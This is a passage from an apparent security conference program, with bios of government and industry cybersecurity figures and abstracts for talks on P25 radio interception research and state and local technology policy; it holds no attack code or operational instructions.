In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in operations analysis; Pacific, Indian Ocean and Middle East affairs; and C3I. Recently he has been focusing on STAR-TIDES, a research project focusing on affordable, sustainable support to stressed populations and public-private interoperability.



Dr. Wells was born in Luanda, Angola, in 1946. He was graduated from the United States Naval Academy in 1967 and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in Tokyo, the first U.S. naval officer to attend there.



Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese Cruisers of the Pacific War, which was published in 1997 and co- edited Crosscutting Issues in International Transformation, published in 2009. His hobbies include history, the relationship between policy and technology, and scuba diving. He has thrice been awarded the Department of Defense Medal for Distinguished Public Service.



Mark Weatherford is the Deputy Under Secretary for Cybersecurity for the National Protection and Programs Directorate (NPPD), a position that will allow DHS NPPD to create a safe, secure, and resilient cyberspace. Weatherford has a wealth of experience in information technology and cybersecurity at the Federal, State and private sector levels.



Weatherford was previously the Vice President and Chief Security Officer of the North American Electric Reliability Corporation (NERC) where he directed the cybersecurity and critical infrastructure protection program. Before NERC, Weatherford was with the State of California where he was appointed by Governor Arnold Schwarzenegger as the state’s first Chief Information Security Officer. Prior to California, he served as the first Chief Information Security Officer for the State of Colorado, where he was appointed by two successive governors. Previously, as a member of the Raytheon Company, he successfully built and directed the Navy/Marine Corps Intranet Security Operations Center (SOC) in San Diego, California, and also was part of a team conducting security certification and accreditation with the U.S. Missile Defense Agency. A former U.S. Navy Cryptologic Officer, Weatherford led the U.S. Navy’s Computer Network Defense operations and the Naval Computer Incident Response Team (NAVCIRT).



Weatherford earned a bachelor’s degree from the University of Arizona and a master’s degree from the Naval Postgraduate School. He also holds the Certified Information Systems Security Professional (CISSP) and Certified Information Security Manager (CISM) certifications. He was awarded SC Magazine’s prestigious “CSO of the Year” award for 2010 and named one of the 10 Most Influential People in Government Information Security for 2012 by GovInfo Security.



Marcus Sachs is a retired Army officer and was also a presidential appointee to the White House Office of Cyberspace Security in 2002-2003. While at the White House he authored parts of the National Strategy to Secure Cyberspace, and proposed the creation of what ultimately became the US-CERT at DHS.



During his Army career he was well known for tinkering with things technical and often found ways to circumvent traditional controls and constraints to achieve mission success. An avid ham radio operator, he was the custodian of two different MARS stations and helped with the engineering of large X.25 packet switching networks in the 1980s long before Netscape and the Internet came along. In 1994 he became known as the Voodoo Switchdoctor thanks to his expertise in building and running secure data networks in Haiti that supported military operations there. In 1998 he was selected by the SECDEF to be an initial member of the DoD's Joint Task Force for Computer Network Operations, where he served until he retired at the end of 2001. At the JTF he spent time chasing malicious actors at all levels, from script-kiddie hackers to terrorists to nation states that were attempting to do harm to DoD networks. After leaving government in 2003 he volunteered as the director of the SANS Internet Storm Center for seven years and became well known at Defcon for sporting his motorcycle leather in the Las Vegas heat.



Currently at Verizon, Marcus now serves on several public-private working groups in the Washington D.C. area and is a frequent speaker at both technical as well as policy centric events and workshops. He holds degrees in Civil Engineering, Computer Science, and Science and Technology Commercialization, and is currently pursuing a Ph.D. in Public Policy. He authored and teaches a three-day course in Critical Infrastructure Protection at the SANS Institute and is a licensed Professional Engineer in the Commonwealth of Virginia.



Mr. Rob Joyce is the Deputy Director of the Information Assurance Directorate (IAD) at the National Security Agency. His organization is the NSA mission element charged with providing products and services critical to protecting our Nation’s systems that carry classified communications, military command and control or intelligence information. IAD provides technical expertise on cyber technologies, cryptography, security architectures and other issues related to information assurance, as well as supplying deep understanding of the vulnerability and threats to national security systems.



Mr. Joyce has spent more than 23 years at NSA, beginning his career as an engineer. He holds a Bachelors Degree in Electrical and Computer Engineering from Clarkson University a Masters Degree in Electrical Engineering from Johns Hopkins. Throughout his career with NSA, he has been the recipient of two Presidential Rank Awards, one meritorious and one at the distinguished level.





return to top

SIGINT and Traffic Analysis for the Rest of Us

Last year, we discovered practical protocol weaknesses in P25, a "secure" two-way radio system used by, among others, the federal government to manage surveillance and other sensitive law enforcement and intelligence operations. Although some of the problems are quite serious (efficient jamming, cryptographic failures, vulnerability to active tracking of idle radios, etc), many of these vulnerabilities require an active attacker who is able and willing to risk transmitting. So we also examined passive attacks, where all the attacker needs to do is listen, exploiting usability and key management errors when they occur. And we built a multi-city networked P25 interception infrastructure to see how badly the P25 security protocols do in practice (spoiler: badly).



This talk will describe the P25 protocols and how they failed, but will focus on the architecture and implementation of our interception network. We used off-the-shelf receivers with some custom software deployed around various US cities, capturing virtually every sensitive, but unintentionally clear transmission (and associated metadata) sent by federal agents in those cities. And by systematically analyzing the captured data, we often found that the whole was much more revealing than the sum of the parts. Come learn how to set up your own listening-post.



Sandy 'Mouse' Clark Sandy Clark (Mouse) has been taking things apart since the age of two, and still hasn't learned to put them back together. An active member of the Hacker community, her professional work includes an Air Force Flight Control Computer, a simulator for NASA and singing at Carnegie Hall, and a minor in history. She is (still) at the University of Pennsylvania. A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game), and anything that involves night vision goggles. Her research explores human scale security, modeling the attacker/defender ecosystem and the unexpected ways that systems interact.

Twitter: @sa3nder

Google Plus: Sandy_Clark



Matt Blaze directs the Distributed Systems Lab at the University of Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.

Twitter: @mattblaze

http://www.crypto.com

return to top

Bad (and Sometimes Good) Tech Policy: It's Not Just a DC Thing

Efforts at the federal level to pass laws like SOPA and CISPA and require that tech companies build backdoors into their services for law enforcement use have attacted widespread attention and criticism, and rightly so. But DC is far from the only place that officials are making decisions that impact the privacy and free speech rights of tech users. State and local officials are jumping into the fray as well, passing laws or creating policies that have immediate impact without the spotlight that accompanies federal action.



In this talk, I will survey several areas where state and local officials have recently been active, including warrantless location tracking, searches of student and employee devices and online accounts, automated license plate recognition, and DNA collection. I will highlight some of the best and worst policies coming from state and local officials. Most of all, I hope to convince you that keeping an eye on -- and even taking time to educate -- your local sheriff or state legislature may be just as important as protecting your freedoms at the national level.



Chris Conley is the Technology and Civil Liberties Policy Attorney at the ACLU of Northern California, where his mission is to ensure that emerging technology bolsters rather than erodes individual privacy and free speech rights. He takes a multidisciplinary approach to protecting civil liberties, from building apps and other tools that help users better understand and control the flow of their personal information to working on resources that help businesses build privacy and free speech protections into ne